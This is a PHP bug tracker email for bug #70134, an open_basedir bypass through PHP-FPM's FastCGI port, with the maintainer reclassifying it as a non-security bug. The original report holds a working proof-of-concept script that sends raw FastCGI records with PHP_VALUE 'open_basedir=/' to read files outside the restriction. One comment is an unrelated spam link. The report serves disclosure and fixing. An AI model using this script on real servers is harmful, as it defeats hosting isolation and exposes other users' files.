Sec Bug->Bug #70134 [Opn]: open_basedir bypass with IP-based PHP-FPM
| From: | cmb@php.net | Date: | Mon, 12 Jul 2021 15:41:04 +0000 |
| Subject: | Sec Bug->Bug #70134 [Opn]: open_basedir bypass with IP-based PHP-FPM | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-234983@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=70134&edit=1
ID: 70134
Updated by: cmb@php.net
Reported by: butesa at freenet dot de
Summary: open_basedir bypass with IP-based PHP-FPM
Status: Open
-Type: Security
+Type: Bug
Package: FPM related
Operating System: Ubuntu
PHP Version: 5.5.27
Block user comment: N
Private report: N
New Comment:
open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.
Previous Comments:
------------------------------------------------------------------------
[2020-01-14 21:45:51] diego dot blanco at treitos dot com
Additionally it seems that open_basedir is bypassed by fsocksopen when using unix sockets, so this
is also exploitable with unix sockets.
------------------------------------------------------------------------
[2018-01-19 19:40:51] bohu at cryp dot email
This critical security issue is still present in PHP 7.0.
At least on Debian Stretch PHP 7.0.27-0+deb9u1.
Any plan to patch it ?
Thx !
------------------------------------------------------------------------
[2017-04-19 10:03:39] xuanhung1606 at gmail dot com
http://tnghomes.net/
------------------------------------------------------------------------
[2015-07-24 20:46:27] butesa at freenet dot de
Sorry, I didn't mean to make this bug report private. There is no sensible information in it.
------------------------------------------------------------------------
[2015-07-24 20:41:55] butesa at freenet dot de
Description:
------------
Please change the implementation of PHP_VALUE so that open_basedir can only be tightened, but not
loosened (as it is already implemented with ini_set()).
At the moment, you can bypass open_basedir by connecting to the FPM port.
Test script:
---------------
<?php
echo 'START ';
echo ini_get('open_basedir');
echo file_get_contents('/etc/hostname');
echo ' END';
echo '<br/>';
if (isset($_GET['stop'])) exit;
$params = array();
$params['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$params['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$params['REQUEST_METHOD'] = 'GET';
$params['QUERY_STRING'] = 'stop=true';
$params['PHP_VALUE'] = 'open_basedir=/';
$params_encoded = '';
foreach ($params as $k=>$v) {
$params_encoded.= chr(strlen($k)).chr(strlen($v)).$k.$v;
}
$len = strlen($params_encoded);
$len_encoded = chr($len >> 8).chr($len & 255);
$fp = fsockopen('127.0.0.1',9000);
fwrite($fp, "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00");
fwrite($fp, "\x01\x04\x00\x01".$len_encoded."\x00\x00".$params_encoded);
fwrite($fp, "\x01\x04\x00\x01\x00\x00\x00\x00");
fwrite($fp, "\x01\x05\x00\x01\x00\x00\x00\x00");
sleep(2);
$result = '';
while (!feof($fp)) {
$result .= fread($fp, 1024);
}
fclose($fp);
$matches = array();
preg_match('/START.*END/s', $result, $matches);
echo $matches[0];
Expected result:
----------------
[shortened for better readability]
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
Actual result:
--------------
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START / my_hostname END
Don't be surprised, you may also encounter bug 63965. In that case, the output will look like
this:
START / my_hostname END
START / my_hostname END
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=70134&edit=1